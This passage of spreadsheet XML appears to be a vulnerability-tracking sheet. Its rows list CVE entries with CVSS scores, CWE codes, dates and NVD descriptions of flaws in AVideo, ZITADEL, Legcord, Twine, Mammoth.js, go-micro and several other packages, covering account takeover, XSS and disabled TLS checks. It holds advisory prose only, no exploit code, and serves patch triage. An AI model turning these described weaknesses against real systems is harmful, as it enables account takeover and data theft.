          <t>WWBN AVideo through 29.2.0 contains a stored cross-site scripting vulnerability that allows users with upload permission to inject script by setting a malicious video trailer1 URL. The value is rendered unescaped in YouPHPFlix2 templates and channel playlists, letting attackers break out of onclick strings or iframe src attributes to execute JavaScript in victims' browsers.</t>
        </is>
      </c>
      <c r="T7" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105089</t>
        </is>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B8" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C8" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105210</t>
        </is>
      </c>
      <c r="D8" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E8" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F8" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G8" s="5" t="inlineStr"/>
      <c r="H8" s="5" t="inlineStr"/>
      <c r="I8" s="5" t="inlineStr"/>
      <c r="J8" s="5" t="inlineStr"/>
      <c r="K8" s="5" t="inlineStr"/>
      <c r="L8" s="5" t="inlineStr"/>
      <c r="M8" s="5" t="inlineStr"/>
      <c r="N8" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O8" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P8" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q8" s="5" t="inlineStr"/>
      <c r="R8" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S8" s="5" t="inlineStr">
        <is>
          <t>ZITADEL 3.x before 3.4.15 and 4.x before 4.17.1 contains a missing authentication flaw in the hosted Login V1 UI, whose second-factor enrollment and initialization handlers act on an identify-only session before any primary factor is verified. Attackers knowing only a victim's login name can enroll attacker-controlled TOTP, OTP-SMS, OTP-Email, or U2F factors, overwrite the verified phone number, and enumerate users through discrepant errors.</t>
        </is>
      </c>
      <c r="T8" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105210</t>
        </is>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B9" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C9" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105213</t>
        </is>
      </c>
      <c r="D9" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E9" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F9" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G9" s="5" t="inlineStr"/>
      <c r="H9" s="5" t="inlineStr"/>
      <c r="I9" s="5" t="inlineStr"/>
      <c r="J9" s="5" t="inlineStr"/>
      <c r="K9" s="5" t="inlineStr"/>
      <c r="L9" s="5" t="inlineStr"/>
      <c r="M9" s="5" t="inlineStr"/>
      <c r="N9" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O9" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P9" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q9" s="5" t="inlineStr"/>
      <c r="R9" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S9" s="5" t="inlineStr">
        <is>
          <t>ZITADEL 4.x before 4.17.1 does not check an organization's inactive state during Login V2 authentication, verifying only the individual user's status. Users of a deactivated organization who hold valid credentials, an existing session, or a refresh token can still sign in, create sessions, and obtain or refresh tokens.</t>
        </is>
      </c>
      <c r="T9" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105213</t>
        </is>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B10" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C10" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105211</t>
        </is>
      </c>
      <c r="D10" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E10" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F10" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G10" s="5" t="inlineStr"/>
      <c r="H10" s="5" t="inlineStr"/>
      <c r="I10" s="5" t="inlineStr"/>
      <c r="J10" s="5" t="inlineStr"/>
      <c r="K10" s="5" t="inlineStr"/>
      <c r="L10" s="5" t="inlineStr"/>
      <c r="M10" s="5" t="inlineStr"/>
      <c r="N10" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O10" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P10" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q10" s="5" t="inlineStr"/>
      <c r="R10" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S10" s="5" t="inlineStr">
        <is>
          <t>ZITADEL before 4.17.1 contains an authentication bypass vulnerability in Login V2 that allows unauthenticated attackers to take over accounts by obtaining OTP codes via the returnCode delivery type. Attackers knowing a login name of a victim with OTP-Email and OTP-SMS enrolled can read both codes from server-action responses to gain MFA-authenticated sessions, including administrator takeover.</t>
        </is>
      </c>
      <c r="T10" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105211</t>
        </is>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B11" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C11" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105293</t>
        </is>
      </c>
      <c r="D11" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E11" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F11" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G11" s="5" t="inlineStr"/>
      <c r="H11" s="5" t="inlineStr"/>
      <c r="I11" s="5" t="inlineStr"/>
      <c r="J11" s="5" t="inlineStr"/>
      <c r="K11" s="5" t="inlineStr"/>
      <c r="L11" s="5" t="inlineStr"/>
      <c r="M11" s="5" t="inlineStr"/>
      <c r="N11" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O11" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P11" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q11" s="5" t="inlineStr"/>
      <c r="R11" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S11" s="5" t="inlineStr">
        <is>
          <t>Legcord 1.1.0 through 1.3.0 contains a path traversal vulnerability in theme IPC handlers that allows script in the Discord page to escape the themes directory via unvalidated theme ids. Attackers running script in the Discord origin, such as through XSS, can abuse themes.folder, themes.uninstall, and themes.install to launch local executables, recursively delete directories, and write files outside the themes directory.</t>
        </is>
      </c>
      <c r="T11" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105293</t>
        </is>
      </c>
    </row>
    <row r="12">
      <c r="A12" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B12" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C12" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105220</t>
        </is>
      </c>
      <c r="D12" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E12" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F12" s="5" t="inlineStr">
        <is>
          <t>NVD</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is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S12" s="5" t="inlineStr">
        <is>
          <t>Twine 2 desktop through 2.12.0 contains a cross-site scripting vulnerability in importStories() that executes markup from imported story files in the editor window. Attackers can craft a story file whose script calls the twineElectron openWithScratchFile IPC bridge to write and open a .bat file, executing code as the user.</t>
        </is>
      </c>
      <c r="T12" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105220</t>
        </is>
      </c>
    </row>
    <row r="13">
      <c r="A13" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B13" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C13" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105208</t>
        </is>
      </c>
      <c r="D13" s="5" t="n">
        <v>7.7</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2026-10-04</t>
        </is>
      </c>
      <c r="P13" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q13" s="5" t="inlineStr"/>
      <c r="R13" s="5" t="inlineStr">
        <is>
          <t>CWE-649</t>
        </is>
      </c>
      <c r="S13" s="5" t="inlineStr">
        <is>
          <t>ZITADEL 4.x before 4.17.3 and 3.x through 3.4.15 protects IdP intent tokens with unauthenticated, malleable encryption, allowing authenticated users to tamper with their own token so it is accepted for another user's external login intent. An attacker who predicts a victim's in-flight intent identifier and wins a timing race can call /v2/idp_intents or /v2/sessions to steal the victim's IdP tokens or hijack their session.</t>
        </is>
      </c>
      <c r="T13" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105208</t>
        </is>
      </c>
    </row>
    <row r="14">
      <c r="A14" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B14" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C14" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105212</t>
        </is>
      </c>
      <c r="D14" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E14" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F14" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G14" s="5" t="inlineStr"/>
      <c r="H14" s="5" t="inlineStr"/>
      <c r="I14" s="5" t="inlineStr"/>
      <c r="J14" s="5" t="inlineStr"/>
      <c r="K14" s="5" t="inlineStr"/>
      <c r="L14" s="5" t="inlineStr"/>
      <c r="M14" s="5" t="inlineStr"/>
      <c r="N14" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O14" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P14" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q14" s="5" t="inlineStr"/>
      <c r="R14" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S14" s="5" t="inlineStr">
        <is>
          <t>ZITADEL 3.x before 3.4.14 and 4.x before 4.16.2 contains an authentication bypass in the hosted Login V1 and Login V2 UIs that accepts passkey or other authenticator enrollment on identify-only login sessions, before any primary factor is verified. Unauthenticated attackers knowing only a victim's login name can register an attacker-controlled authenticator and log in as that user, bypassing existing passwords and MFA.</t>
        </is>
      </c>
      <c r="T14" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105212</t>
        </is>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B15" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C15" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105219</t>
        </is>
      </c>
      <c r="D15" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E15" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F15" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G15" s="5" t="inlineStr"/>
      <c r="H15" s="5" t="inlineStr"/>
      <c r="I15" s="5" t="inlineStr"/>
      <c r="J15" s="5" t="inlineStr"/>
      <c r="K15" s="5" t="inlineStr"/>
      <c r="L15" s="5" t="inlineStr"/>
      <c r="M15" s="5" t="inlineStr"/>
      <c r="N15" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O15" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P15" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q15" s="5" t="inlineStr"/>
      <c r="R15" s="5" t="inlineStr">
        <is>
          <t>CWE-1333</t>
        </is>
      </c>
      <c r="S15" s="5" t="inlineStr">
        <is>
          <t>Mammoth.js 1.3.0 before 1.12.3 contains a regular expression denial of service vulnerability in the style map tokeniser in lib/styles/parser/tokeniser.js due to overlapping regex alternatives. Attackers can supply a crafted .docx with an unterminated quoted string of repeated backslash escapes in mammoth/style-map to block the Node.js event loop.</t>
        </is>
      </c>
      <c r="T15" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105219</t>
        </is>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B16" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C16" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105295</t>
        </is>
      </c>
      <c r="D16" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E16" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F16" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G16" s="5" t="inlineStr"/>
      <c r="H16" s="5" t="inlineStr"/>
      <c r="I16" s="5" t="inlineStr"/>
      <c r="J16" s="5" t="inlineStr"/>
      <c r="K16" s="5" t="inlineStr"/>
      <c r="L16" s="5" t="inlineStr"/>
      <c r="M16" s="5" t="inlineStr"/>
      <c r="N16" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O16" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P16" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q16" s="5" t="inlineStr"/>
      <c r="R16" s="5" t="inlineStr">
        <is>
          <t>CWE-494</t>
        </is>
      </c>
      <c r="S16" s="5" t="inlineStr">
        <is>
          <t>GitAhead 2.5.0 through 2.7.1 contains an insecure update mechanism that installs downloaded updates without integrity or signature verification and permanently ignores TLS errors after one SSL error dialog. Network attackers presenting an invalid certificate once can intercept later automatic update checks, offer a fake version, and execute code as the user upon installation.</t>
        </is>
      </c>
      <c r="T16" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105295</t>
        </is>
      </c>
    </row>
    <row r="17">
      <c r="A17" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B17" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C17" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97307</t>
        </is>
      </c>
      <c r="D17" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E17" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F17" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G17" s="5" t="inlineStr"/>
      <c r="H17" s="5" t="inlineStr"/>
      <c r="I17" s="5" t="inlineStr"/>
      <c r="J17" s="5" t="inlineStr"/>
      <c r="K17" s="5" t="inlineStr"/>
      <c r="L17" s="5" t="inlineStr"/>
      <c r="M17" s="5" t="inlineStr"/>
      <c r="N17" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O17" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P17" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q17" s="5" t="inlineStr"/>
      <c r="R17" s="5" t="inlineStr">
        <is>
          <t>CWE-201</t>
        </is>
      </c>
      <c r="S17" s="5" t="inlineStr">
        <is>
          <t>Insertion of Sensitive Information Into Sent Data vulnerability in StylemixThemes Cost Calculator Builder cost-calculator-builder allows Retrieve Embedded Sensitive Data.This issue affects Cost Calculator Builder: from n/a through 4.0.17.</t>
        </is>
      </c>
      <c r="T17" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97307</t>
        </is>
      </c>
    </row>
    <row r="18">
      <c r="A18" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B18" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C18" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105216</t>
        </is>
      </c>
      <c r="D18" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E18" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F18" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G18" s="5" t="inlineStr"/>
      <c r="H18" s="5" t="inlineStr"/>
      <c r="I18" s="5" t="inlineStr"/>
      <c r="J18" s="5" t="inlineStr"/>
      <c r="K18" s="5" t="inlineStr"/>
      <c r="L18" s="5" t="inlineStr"/>
      <c r="M18" s="5" t="inlineStr"/>
      <c r="N18" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O18" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P18" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q18" s="5" t="inlineStr"/>
      <c r="R18" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="S18" s="5" t="inlineStr">
        <is>
          <t>go-micro before 6.0.0 contains an improper certificate validation vulnerability that allows network attackers to impersonate services because the shared TLS helper sets InsecureSkipVerify to true by default. Man-in-the-middle attackers can present any certificate to intercept or modify gRPC transport, HTTP and RabbitMQ broker, and Consul or etcd registry traffic, including authentication tokens and credentials.</t>
        </is>
      </c>
      <c r="T18" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105216</t>
        </is>
      </c>
    </row>
    <row r="19">
      <c r="A19" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B19" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C19" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105218</t>
        </is>
      </c>
      <c r="D19" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E19" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F19" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G19" s="5" t="inlineStr"/>
      <c r="H19" s="5" t="inlineStr"/>
      <c r="I19" s="5" t="inlineStr"/>
      <c r="J19" s="5" t="inlineStr"/>
      <c r="K19" s="5" t="inlineStr"/>
      <c r="L19" s="5" t="inlineStr"/>
      <c r="M19" s="5" t="inlineStr"/>
      <c r="N19" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O19" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P19" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q19" s="5" t="inlineStr"/>
      <c r="R19" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="S19" s="5" t="inlineStr">
        <is>
          <t>gopay before 1.5.119 disables TLS certificate verification in defaultClient() in pkg/xhttp/client.go, allowing man-in-the-middle attackers to impersonate payment provider APIs. Attackers can present any certificate to read merchant credentials, signatures and transaction data, and modify payment, refund and order query responses.</t>
        </is>
      </c>
      <c r="T19" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105218</t>
        </is>
      </c>
    </row>
    <row r="20">
      <c r="A20" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B20" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C20" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105221</t>
        </is>
      </c>
      <c r="D20" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E20" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F20" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G20" s="5" t="inlineStr"/>
      <c r="H20" s="5" t="inlineStr"/>
      <c r="I20" s="5" t="inlineStr"/>
      <c r="J20" s="5" t="inlineStr"/>
      <c r="K20" s="5" t="inlineStr"/>
      <c r="L20" s="5" t="inlineStr"/>
      <c r="M20" s="5" t="inlineStr"/>
      <c r="N20" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O20" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P20" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q20" s="5" t="inlineStr"/>
      <c r="R20" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="S20" s="5" t="inlineStr">
        <is>
          <t>The gist RubyGem before 6.1.0 contains an improper certificate validation vulnerability that allows on-path attackers to intercept HTTPS traffic because http_connection in lib/gist.rb sets VERIFY_NONE. Attackers can present any certificate to read or modify GitHub API traffic, stealing OAuth tokens and login credentials to read and modify the victim's gists.</t>
        </is>
      </c>
      <c r="T20" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105221</t>
        </is>
      </c>
    </row>
    <row r="21">
      <c r="A21" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B21" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C21" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105222</t>
        </is>
      </c>
      <c r="D21" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E21" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F21" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G21" s="5" t="inlineStr"/>
      <c r="H21" s="5" t="inlineStr"/>
      <c r="I21" s="5" t="inlineStr"/>
      <c r="J21" s="5" t="inlineStr"/>
      <c r="K21" s="5" t="inlineStr"/>
      <c r="L21" s="5" t="inlineStr"/>
      <c r="M21" s="5" t="inlineStr"/>
      <c r="N21" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O21" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P21" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q21" s="5" t="inlineStr"/>
      <c r="R21" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="S21" s="5" t="inlineStr">
        <is>
          <t>The alexpechkarev/google-maps Laravel package through 12.16 disables TLS certificate verification by default because the bundled config sets ssl_verify_peer to FALSE, which is passed to CURLOPT_SSL_VERIFYPEER. On-path attackers can present any certificate to intercept Google Maps web-service requests, steal the API key from the query string, and tamper with responses.</t>
        </is>
      </c>
      <c r="T21" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105222</t>
        </is>
      </c>
    </row>
    <row r="22">
      <c r="A22" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B22" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C22" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105223</t>
        </is>
      </c>
      <c r="D22" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E22" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F22" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G22" s="5" t="inlineStr"/>
      <c r="H22" s="5" t="inlineStr"/>
      <c r="I22" s="5" t="inlineStr"/>
      <c r="J22" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="K22" s="5" t="inlineStr"/>
      <c r="L22" s="5" t="inlineStr"/>
      <c r="M22" s="5" t="inlineStr"/>
      <c r="N22" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O22" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P22" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q22" s="5" t="inlineStr"/>
      <c r="R22" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="S22" s="5" t="inlineStr">
        <is>
          <t>maclof kubernetes-client 0.17.0 before 0.32.0 disables TLS certificate verification in parseKubeconfig() and parseKubeconfigFile() when a kubeconfig lacks certificate-authority-data, ignoring insecure-skip-tls-verify. On-path attackers can impersonate the Kubernetes API server to capture Bearer tokens or Basic credentials and tamper with WebSocket or REST API traffic.</t>
        </is>
      </c>
      <c r="T22" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105223</t>
        </is>
      </c>
    </row>
    <row r="23">
      <c r="A23" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B23" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C23" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105294</t>
        </is>
      </c>
      <c r="D23" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E23" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F23" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G23" s="5" t="inlineStr"/>
      <c r="H23" s="5" t="inlineStr"/>
      <c r="I23" s="5" t="inlineStr"/>
      <c r="J23" s="5" t="inlineStr"/>
      <c r="K23" s="5" t="inlineStr"/>
      <c r="L23" s="5" t="inlineStr"/>
      <c r="M23" s="5" t="inlineStr"/>
      <c r="N23" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O23" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P23" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q23" s="5" t="inlineStr"/>
      <c r="R23" s="5" t="inlineStr">
        <is>
          <t>CWE-15</t>
        </is>
      </c>
      <c r="S23" s="5" t="inlineStr">
        <is>
          <t>Legcord 1.1.0 through 1.3.0 contains a configuration injection vulnerability that allows script in the Discord page to write any config key via the window.legcord settings.setConfig bridge. Attackers exploiting a Discord XSS can set additionalArguments to persistently add --proxy-server and --ignore-certificate-errors switches, routing all client traffic through an interception proxy.</t>
        </is>
      </c>
      <c r="T23" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105294</t>
        </is>
      </c>
    </row>
    <row r="24">
      <c r="A24" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B24" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C24" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105147</t>
        </is>
      </c>
      <c r="D24" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E24" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F24" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G24" s="5" t="inlineStr"/>
      <c r="H24" s="5" t="inlineStr"/>
      <c r="I24" s="5" t="inlineStr"/>
      <c r="J24" s="5" t="inlineStr"/>
      <c r="K24" s="5" t="inlineStr"/>
      <c r="L24" s="5" t="inlineStr"/>
      <c r="M24" s="5" t="inlineStr"/>
      <c r="N24" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O24" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P24" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q24" s="5" t="inlineStr"/>
      <c r="R24" s="5" t="inlineStr">
        <is>
          <t>CWE-259, CWE-798</t>
        </is>
      </c>
      <c r="S24" s="5" t="inlineStr">
        <is>
